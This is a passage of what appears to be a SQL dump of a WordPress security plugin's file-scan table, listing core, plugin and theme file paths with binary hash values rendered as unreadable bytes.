o3\n��l���Q�0�','',0,'?'),('�ޙ�p�jY�!�?�\\�','wp-includes/wp-includes/customize/class-wp-customize-new-menu-control.php',0,'��N��p��aC�q�k','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('��ĸ:�,p�1��Hr','wp-admin/js/dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��)�{)�%�','�{G���\n�<Q�IO�	���%�k���%','',0,'?'),('�\0��וoxi3%\r+]kg','wp-admin/images/post-formats.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���\0���%3���','9ƺ�&�]��n�Eu��a]iF���Ƴ�','',0,'?'),('�	����p�H-l\0','wp-includes/wp-includes/js/jquery/ui/effect-highlight.js',0,'n+)�����I�L\r�','n+)�����I�L\r�','qp��G%�S���V���9|�����@S�Xn','',0,'?'),('�0�;�-,�A�Ey�','wp-includes/theme-compat/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�S��;��I��(','���U�kx�r��Lb�\"��JAF�(u;	\0�&','',0,'?'),('�B��\"^I\n���hƜ','wp-includes/js/dist/dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��B�� @�0an�$','q�L\\i�q3���o���b�5�hk��� yzۋ','',0,'?'),('�O�u�6��o�G��','wp-content/plugins/wp-cerber/assets/flags/lr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�a�!^KG�C �,�','b쁣������=Q��*���IGTG	�!]E��9','',0,'?'),('�a�Oj\'�ŻD*ցV4','wp-cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�>F�m8ɃK`�','hi��g��F���-��	0&������yl�','',0,'?'),('�m�5^���u��9>','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zy���.^�(/t�t','�6�/|�\'��kI7Yҝ���8~l�	�H���6','',0,'?'),('�}\'�Ǧ@��g7��j�','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png',0,'��1����v��R','��1����v��R','N3G�\'�`��+R>�P]E�γg/�b?���UX','',0,'?'),('�#�\' �~����/z�F','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ޜ�t�j̥<�','�������T����	?W��E>}�u���+��','',0,'?'),('�e�\\�k�c��Xf','wp-includes/customize/class-wp-customize-upload-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؓ�B8�?)ivr��`-�','�~t~��X���% ��K/3-n6\0�RB�֨G�','',0,'?'),('��J���l���h�','wp-includes/wp-includes/rest-api/class-wp-rest-server.php',0,'\0}��7V5�I�385','\0}��7V5�I�385','SB5}�uٵŶ/�����S�5%�8�z�V�','',0,'?'),('���n���8�y�YP','wp-includes/wp-includes/css/dist/list-reusable-blocks/style.css',0,'�����(����6�','�����(����6�','��b1O�������:�DDHR�cj�ѐ�P�\r','',0,'?'),('�ړN�P*X5���w','wp-includes/wp-includes/css/editor.css',0,'��`b�L֏�Uy�/','��`b�L֏�Uy�/','��\r�~�W$A�\"ac�����G<��HZ<�8`','',0,'?'),('��q�82��v�&#M','wp-includes/js/tinymce/plugins/wpview/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j5q��S\rX���i��','Ej\Z��\Z�I���3J��G�jVݒ��6<S�9P','',0,'?'),('��H�����%��,��','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('�~�Soֆ��2��','wp-includes/wp-includes/customize/class-wp-widget-area-customize-control.php',0,'��<w܌*�t���!�','��<w܌*�t���!�','44�w�Vv�Oa5G��39��I����=�5��i','',0,'?'),('���#�iJ�H�?�@�','wp-includes/class-wp-http-curl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�`3F�O�,;N#���','��@�� ����T��(�\nD�ڠ��Y��	�]�2','',0,'?'),('�w����V���!�','wp-admin/includes/class-wp-ms-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��8�����Lk�5�Ѕ','�\'�<o��\'.��G�\"��v�2gwi̋\0','',0,'?'),('��z~{��Q@���L|','wp-includes/wp-includes/css/dist/format-library/style-rtl.min.css',0,'�k(O�1m<�0v��vV','�k(O�1m<�0v��vV','���1�q�XX|ί}Cw�}�o�]5F\n�~��','',0,'?'),('�\Z�K�^���\n�','wp-includes/blocks/image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�s�d\'���+h���','�,)�\Z����Z8��u�A�,i^���bes�t','',0,'?'),('�7H-��0�\\t�\nC�','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md',0,'Y��ϛ�vj��\n���','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('�S�1ox9�:��,��','wp-includes/wp-includes/block-patterns/text-two-columns.php',0,'��W�ۆe���9���!>','��W�ۆe���9���!>','bP9���ޤyP���g��\"��Ę��\"V�','',0,'?'),('�UA�;��,}����v�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',0,'���aER>60�.)H','���aER>60�.)H','�K-I���6A��,\\��nQ�P���&','',0,'?'),('�pɄ�bq���dgf��','wp-includes/wp-includes/js/customize-selective-refresh.min.js',0,'E�G�埳6�0�b�','E�G�埳6�0�b�','G���i�A�w_�P�g�9����Oɓ��M�','',0,'?'),('�z^}��¤hh3\r��w','wp-content/plugins/wordfence/images/options.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��Ѵ����A�','D:�bw�#^����4�B�KIP�?	z�n�V�_','',0,'?'),('䆮G*�~�5H���I','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lS?,�ra�4;�^F','�D�;�䏑��eH�i�b�\Z�?�b����','',0,'?'),('䗦���L��z/��%','wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��2J娳�YB瘱�','\ZP�L㨒���Zi�t�A�������7d�','',0,'?'),('�������J���','wp-includes/wp-includes/theme-compat/embed-content.php',0,'�m\'牉�TeD�]pCA','�m\'牉�TeD�]pCA','J�ϑ߷�`�š+,��jr�#eQ�䫖 ���','',0,'?'),('����zpKC�{\\>��','wp-admin/js/dashboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VP�k��\Z��l(�','/S�\0�\\��T��Z��OL\\3aˑ���','',0,'?'),('���1�]�M|�K�FZ','wp-content/plugins/wordfence/lib/wfBulkCountries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9	+Oyծ�urO�3�\n','X&o1\'�cg��ml��yS����t�����\r','',0,'?'),('�\00��q�ĊNy)��','wp-includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�v/�M��;�7/N:','AI�OZl���wC�fj�@�r}���H!ѧ�Q','',0,'?'),('�\07m	�\n\\[�R\'�+','wp-includes/wp-includes/sodium_compat/autoload.php',0,'uw�h[e��z�x��','uw�h[e��z�x��','wp�B��3K�r3_�!�}��b����d�v\r��','',0,'?'),('�\'�`F̔�~�Ė��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���؍��0�+C����','`>&i(Ź���C���f���&���>Y\"�','',0,'?'),('�+��i�aM�y�f��','wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php',0,'��d���j�F����3','��d���j�F����3','5���s�	��O>���{��ĩ�2�!�.�1��','',0,'?'),('�4����m�T曢�A','wp-content/plugins/wp-cerber/assets/flags/cx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�f��mW}}]�','db\'f-�LZ�\0g �]��_��׭\'���o','',0,'?'),('�C�Ǵ��k�q{.L','wp-includes/js/dist/block-serialization-default-parser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NpʊW\0=�7xC�9','0�f��VZ]�]aD�%��\n̨\r�(��\\�B','',0,'?'),('�H��4�.\\�:��#��','wp-admin/css/l10n.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+.�[H\rϬ.k��/ ','�������lg����j-u��\\$?���)\\�y6@','',0,'?'),('�M<61=�3|\0\"?���','wp-includes/wp-includes/js/dist/hooks.js',0,'�\'����ʣJ1�iz��','�\'����ʣJ1�iz��','*��F;���1Y#����W��ˈ���o���','',0,'?'),('�R��5?�- S�^H��','wp-admin/js/editor-expand.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�\\(��p���[','���;W#�}Gj�[��K�SAKZ�iˤ[Q4c\n','',0,'?'),('�\\=NҎXfڸ\rg&�	�','wp-includes/wp-includes/js/dist/blocks.min.js',0,'�F�2�~����CO�','�F�2�~����CO�',',f;��8`�=�[D�\n\\cA�O�Te�� ','',0,'?'),('�eŐ��n���A�','wp-content/plugins/wordfence/lib/wfView.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�ܺ�-ˆN\n�\\�nO','x�2Q����mk٫@IFRh�Hu~�R8�\"z�K4�','',0,'?'),('�e��)��\r�se','wp-includes/wp-includes/js/customize-preview-widgets.min.js',0,'�T-�6�P)H�=��','�T-�6�P)H�=��','����6ª�e����yмbdf}��5��','',0,'?'),('���5�1Q�?�_��','wp-includes/https-migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s9�4W#2��!H�߾�','2�|P��Ł�muН���~k��37rz0�x�A�','',0,'?'),('���I<r�y�Y���','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',0,'Y[�&A*zϦ/��?<�','Y[�&A*zϦ/��?<�','�������Dn��N����AU)n�J�','',0,'?'),('峳$� @z6�\0`��/�','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ջ}��B��H��71','��\"�beTb�$����׉�\n���~�ln��','',0,'?'),('��h�v���_EŮ���','wp-includes/wp-includes/class-wp-http-encoding.php',0,'Usg2eޫj9�EA����','Usg2eޫj9�EA����','t��1��XZ��C�9��c��x](D[9��O�','',0,'?'),('�ݡ��&����R�� �','wp-includes/wp-includes/blocks/table/block.json',0,'����̀)#\rS� ��','����̀)#\rS� ��','�q#�.Z!�g�l���讍T�\0�u�\'EA�?�','',0,'?'),('��O,�T�\\<�;I�','wp-includes/wp-includes/ms-files.php',0,'Z�]G���y��2D','Z�]G���y��2D','�Z�h�x�^�/������#���Z^N��_\Z','',0,'?'),('�\r�b\\��ɍ�\Z��','wp-admin/edit-form-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-gP\"	�P+Pg��h','����b�$磷#�6��Db˓���Z����4l(','',0,'?'),('�+���.��eF��','wp-admin/css/dashboard.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��w.��Ş1->�QY','�}5�X_Kr�Oe�鎜��g�i�v��\Z8��','',0,'?'),('�/�P&aC2�!f2Z��n','wp-includes/wp-includes/js/underscore.min.js',0,' >��>��S����b�%',' >��>��S����b�%',' ʍ��LM>	�ύ��5́kv��k�PHɇ0','',0,'?'),('�6�n��[l��v񺦼q','wp-content/plugins/wp-cerber/assets/flags/bl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�9e���kk�R�o���S','wp-includes/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\Z���/}ͳYM=��','6K�(|�/�R��̵�;$.�Jf8{�v�G�','',0,'?'),('�G��5�@����07��','wp-includes/images/blank.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʟg��h�kK��f','>��E�G��L�� E��JQ���|�B���ij�','',0,'?'),('�J~_o�f�k�����','wp-includes/js/wp-embed.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R%�qU�0�8}_��','ޚT�d����U�2#*_�D�WQT�n�I%Ǭ�','',0,'?'),('恴L�ޠe���/�u�','wp-content/plugins/wp-cerber/assets/scanner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g#z���w���l\n\'�','�q��̇P�I��.K�{r�P��|��F\n�m','',0,'?'),('�,�$�|�W����','wp-includes/wp-includes/theme-compat/embed.php',0,'�Ţs�^��q�cb�','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�漢�����%����','wp-includes/wp-includes/js/dist/a11y.js',0,'�Ɲ���լިF��','�Ɲ���լިF��','��w���R�x��$�r�դɯ�D���`.��u','',0,'?'),('様��7�^�b�\"�','wp-content/plugins/wordfence/images/back_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���g��i���>','�䏛N�7�g΋�?�Fb!}��ݿ��C��鳇','',0,'?'),('�y�l��s�U>�<��','wp-includes/css/customize-preview.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���Sb�s��\"','ߌ��I�R�\\Ĺ�e��z3�QsC����Q�','',0,'?'),('����eҕ�h�V�\"�','wp-content/plugins/wordfence/views/options/block-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�PK���.ٳ�\r','�+�>�����U��a`.4m킳+����U','',0,'?'),('��W���\"���Sk:�','wp-admin/images/align-center-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�r�5*J7�If','�8tf�*Jw�T�^��H�>���1�JD�ο','',0,'?'),('����P�IcD��ƾ�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J�s��Ǚ�B','��ER��Jb�ȸI\"��t�],�qP�1\\fD','',0,'?'),('����x*�ñ�U���','wp-includes/block-patterns/two-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��_�w?V�:�g��C','w@�c|�h�(��Hz�X[�_�:�x��0�)K','',0,'?'),('�⣣�M�O����U�','wp-admin/js/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����I=k\Z���','�\\\\^�*k,;�_4�\'� oiU��@&e��','',0,'?'),('���\"�LJ1�C4ND�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0ӝ�w�Yh�,�*�','�`c��LX����6��Im � B�]se��f�','',0,'?'),('��(���E�U(ʃ','wp-includes/wp-includes/ID3/module.tag.lyrics3.php',0,'~w�\"[�װ���A�>A','~w�\"[�װ���A�>A','�V*��&)��~��d�}K�,����E�s�','',0,'?'),('���;�W����l�','wp-includes/js/dist/deprecated.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���֌>�H7� �UR','\r�d�����۠c��Lf�z�#j�5E�Q�ޝ','',0,'?'),('�]:]6Q(s-�B��','wp-content/plugins/wp-cerber/assets/flags/so.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�:�vU:{��','I���˱��	-���f�rǏc�k��@�3�`	=','',0,'?'),('�\"�ơ���7vs+�','wp-admin/includes/class-pclzip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9MY�^mluRg','\0\rhV!\Z7\Z�虁�K`2�_\\H	��G\n�;=','',0,'?'),('�Djמ�8]fД_�','wp-includes/class-wp-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�� �B��Ի��','���/�����0�=�|{h��n�R�','',0,'?'),('�GeƧ����tn%��T','wp-includes/wp-includes/js/codemirror/jsonlint.js',0,'I)fy��kT�+��<՟','I)fy��kT�+��<՟','�$D;;����0���F�~p��GғF�ˁ��','',0,'?'),('�T�|h0l�-v}h�Z','wp-includes/wp-includes/js/dist/html-entities.js',0,'���2�@؇\0����)','���2�@؇\0����)','�_Z�#W�șf�X���c�B���`��dQfH�,','',0,'?'),('�b`K�\'��컜���K','wp-includes/functions.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�4ؒT�$�0B-�','x�89@��G��#���G�b}y\'�A����v','',0,'?'),('�x�Δ)NX3u/@�4Y�','wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N���>�EH�I��� �','u).H����� �����C���HsԐ`$�','',0,'?'),('�P�wl�ﻣ8��','wp-content/themes/shootingstar/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�(��Ř5`%��','d��J%�#�ӝ\0�Wu��䔹4e��Պ�','',0,'?'),('�J��ёe�\rXd��$�','wp-includes/class-wp-customize-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���^Oި�����','�K�WC�-�v�l�w� ��R\Z�xS)[R�','',0,'?'),('碝i\Z�����u.�|�','wp-includes/wp-includes/blocks/video/block.json',0,'�4�P=C�g �\'L�','�4�P=C�g �\'L�','g��G�a$�E������˘UQbyħ�+','',0,'?'),('�%-�+(�묖���','wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',0,'\"�2s7��\\�i#��E','\"�2s7��\\�i#��E','a������t��W��	�3N�\Z��`x�hI�`�','',0,'?'),('�+�뿨\'�)��','wp-includes/wp-includes/js/swfupload/license.txt',0,'��[�`�^�-�o�QWz','��[�`�^�-�o�QWz','��:)��6�a\"3r��\rP\rN�4�yJ�ַ��U�q','',0,'?'),('���K�g���o#�0','wp-activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�#w:m���2��A\"','���^>�*���r���I+��{�ф�U�b�&�','',0,'?'),('�ʼn�	i��/Э','wp-includes/formatting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H(@q���Tj��','�g��\n?#��\'^�\'d�8�\Zi��=\Z������','',0,'?'),('��H���l��{!D#�!','wp-admin/js/color-picker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pgG��&�3�,�','S����<�`�J��=�4mS�\"kY��Mׂҡ�','',0,'?'),('���L�.dDv��','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�0�j8�2\n�s�','v��\\qY{S��<|+��{�(m��?)��D�=�','',0,'?'),('��F�ZY��C8��3E','wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��ٳ���v�2.','�ڷ���Rkd�NZ��h��V�\r�<p���=1','',0,'?'),('���C5�6o��2��','wp-includes/wp-includes/blocks/latest-comments.php',0,'��j��c\r9+@/K<�2','��j��c\r9+@/K<�2','=�\n+rS�D;��|�Y}�VĒP[�o =]LJ','',0,'?'),('��÷�g$�M�s�','wp-content/plugins/wordfence/views/waf/option-rate-limit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)YMˍ�\\Ξ��\'','*�eG�P$����б�աmw&��:OL/1>N','',0,'?'),('��XB��A���~�','wp-includes/wp-includes/css/dist/nux/style.min.css',0,'��cڷ�\r�\\Kn]\nO�','��cڷ�\r�\\Kn]\nO�','h��iu���E���UJc]���\\d`M\Zqi	�սq','',0,'?'),('�%y�>}H�o��(6','wp-includes/js/jquery/ui/core.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g{����!�S{5�','�e��%�h�\\f���軙tuv�����R','',0,'?'),('�SHLenP�q7�č�','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����`�j|��y�','i��OGi����F|4�8��V��j�\n#V-L','',0,'?'),('�f�i�`�=@T��o�','wp-admin/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),('�n`�5�	�\n0�R�a','wp-content/themes/sg-window/genericons/genericons/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s/�n]�d���z�?','�*���SW����.��~5t�=���V�p̦�','',0,'?'),('�wj0��67���@�T','wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�2s7��\\�i#��E','a������t��W��	�3N�\Z��`x�hI�`�','',0,'?'),('�J���y��0m�`�/','wp-includes/class-IXR.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���C`q�x�',']���z�p��q�N\"CKW��鴛��c��M','',0,'?'),('�Ò���/���?��k','wp-includes/wp-includes/images/smilies/icon_exclaim.gif',0,':\\��>5�\0r���sg�',':\\��>5�\0r���sg�','�L�ɵ�H��A(�xʓ2�EP%�	��#���#�5','',0,'?'),('�\0�]�p��ޑ�	\rG','wp-admin/css/customize-nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����+�D�8rnlU��','�U����2��#d�{���3��E8���U�','',0,'?'),('��00Us�\0m��V�9','wp-includes/wp-includes/js/dist/vendor/lodash.js',0,'2n�B2���]�� �','2n�B2���]�� �','\"��Qe��\\NJhb�Bj�{i�J\n�Қi;eZ�3','',0,'?'),('�$𽉙l��z��!','wp-includes/wp-includes/js/jquery/ui/effect-transfer.js',0,'OԩN��i���1','OԩN��i���1','Ł\0p�,�\\�!ON)�Q���Xl ��k�s�l�','',0,'?'),('��njg^	:�s�A�&','wp-includes/wp-includes/Requests/Exception/HTTP/412.php',0,'%��Iܷ��=�7��V�','%��Iܷ��=�7��V�','S�A�4c\\D�56-��#��d*���ҽӾ�R���','',0,'?'),('���\0�O�7�7t���{','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',0,'���m3�E�?��՛','���m3�E�?��՛','0pU��Ĭ���h���C�r+���˞I�{-qA�','',0,'?'),('��tU;�56|�4Ql','wp-content/plugins/wp-cerber/assets/select2/dist/js/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|Ԋ2�3�\\�:=�','��	�<�(*Wv���Ћtw��r_��t�i�	','',0,'?'),('���&&le��{Ӣ��Hb','wp-content/themes/shootingstar/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��NE\0B&�	��]','bɳ���m�n���j{�R5��`�#`','',0,'?'),('���W����:��]','wp-includes/js/dist/primitives.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','աV�?�ѴV{�#�M','=W�X��\r�6�l;��h����)H�C�dx','',0,'?'),('��V�>��d��O�d','wp-includes/wp-includes/js/jquery/jquery.form.min.js',0,'܉l�Ȍ��*��D�','܉l�Ȍ��*��D�','zt�O1� =2X����Q���_�y �}Z\r','',0,'?'),('���Q�o�H*���(�','wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��I��+ƾ��=��','d�C�T�����e&,)Ѵ��FG�\Zd�ON�','',0,'?'),('�+����3�pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�%�̍��ų�<��','ŔWF&�x\Z	�\"�g��ߠ���;�=�D�ٗx','',0,'?'),('�(��v/���&��C)','wp-includes/wp-includes/js/jquery/ui/effect-shake.js',0,'�;5�_������ƽ\"�','�;5�_������ƽ\"�','�$D���IAXF����wH�YO�J3�K��','',0,'?'),('�F�j!Y�{.J=,��','wp-admin/images/stars.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[����><�k�{��(�','/	��\"���Fa챔<SY��g���؉F��@','',0,'?'),('�]�W/>�}<8� VF�','wp-admin/includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6*pO��,ё� -X�','�4|ǛD}c�Hd�Ɖ)Y[�q�K���-�','',0,'?'),('�^.�jT}�<��I��','wp-admin/js/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j0�P�3#��','!K~�f���nN��B��\0��.@�K�U�','',0,'?'),('�g���U)\rR(�','wp-includes/js/dist/is-shallow-equal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%H2�l�u��[�S��','�8�cyAՕ�n�^�\r;72	y��I\n����','',0,'?'),('�|:��x�Z~�*�wl�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����[f��0�=G�','�[G�f����N����	rG�Ƭ���.','',0,'?'),('�T�B3��G��{','wp-includes/Requests/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K�N���knT�','�=��ln&�����ă�J�ӗ���~�����l','',0,'?'),('�;X��^�$>�8','wp-includes/wp-includes/js/jquery/ui/effect-explode.min.js',0,'�Ƒ���l��Ե','�Ƒ���l��Ե','\"�Q�\0_jՈ\'5(ʏ�2&-(��j;�|]','',0,'?'),('�Sq	o�@rL��H','wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.js',0,'���\"���\n�-ۤ�Y','���\"���\n�-ۤ�Y','$9~�=:����Z�F�m}�A�5ks�	V#� �*','',0,'?'),('頻�yN<���9�o\Z<','wp-admin/js/xfn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�\'����>�Y�','�b*/��m/���a�ŵ�>��I湒h��+','',0,'?'),('��m�Mt���W�B','wp-admin/images/align-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�y0�d�Z�o.h��','�_]�<#�S�\"�B^U4_�Q<!@�x?J$��K�','',0,'?'),('�]��{dU�3�p','wp-includes/wp-includes/customize/class-wp-customize-media-control.php',0,'E�lh�¸�j�68��','E�lh�¸�j�68��','V]�l��1W�+	{6v��ޣ��C���=��','',0,'?'),('����t���Z�O\'� \n','wp-includes/js/thickbox/macFFBgHack.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('����V,E@�X���y','wp-includes/SimplePie/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��8?Q��h׊�','~�`��嫌�<��B\n鲙%]��X}\Zi��','',0,'?'),('��s�*p�&�[a�y','wp-includes/wp-includes/js/jquery/ui/effect-pulsate.min.js',0,'4\0�q2�l����d','4\0�q2�l����d','ȩ~��0M���0\"���7	]1�sP�J�T','',0,'?'),('�kLN\0��x6@','wp-admin/css/list-tables.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UݪAcT�g�@��{N','�XAݸ.`Q��rC����w@�4b�X���ϭ�	','',0,'?'),('�-.��x�ɤ�R��','wp-admin/includes/privacy-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�/��nC�0^`���','Y\'C5�\'g�u���**Ƭy�%R(�T�S����','',0,'?'),('�0J����fx�#X{�','wp-includes/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('�4���2�)A.;4�','wp-includes/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Q	�!�@�٧T\r','	�Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�5��.Q>�k�ċ��_�','wp-includes/wp-includes/SimplePie/Net/IPv6.php',0,'\r ��F�E��,�h�','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),('�Ov(� ���fF','wp-includes/wp-includes/js/jquery/ui/tabs.min.js',0,'�a`|��^(=`��hv','�a`|��^(=`��hv','L�.X_	�DJ��tk��H��!|��ݔJ��x','',0,'?'),('�Q�A�	�=H��7-','wp-includes/js/jquery/ui/droppable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/���_\na��G���','m�U\'mU�7m�N���EFDg;�N�q��~�','',0,'?'),('�S�����_B=�*�','wp-includes/wp-includes/blocks/gallery/block.json',0,'������9��Qv��','������9��Qv��','��PgcZn1q��b�-޼���x�]ME��ܻ���','',0,'?'),('�d\n�v;�O1:���,Tn','wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A\Z����w�d6[�','!��yq�� �����	������#ҝ;\'','',0,'?'),('�r@��D��Z�䯩','wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!K�	5y���S*','���Ty�O�%u;�U�}�g�1��)�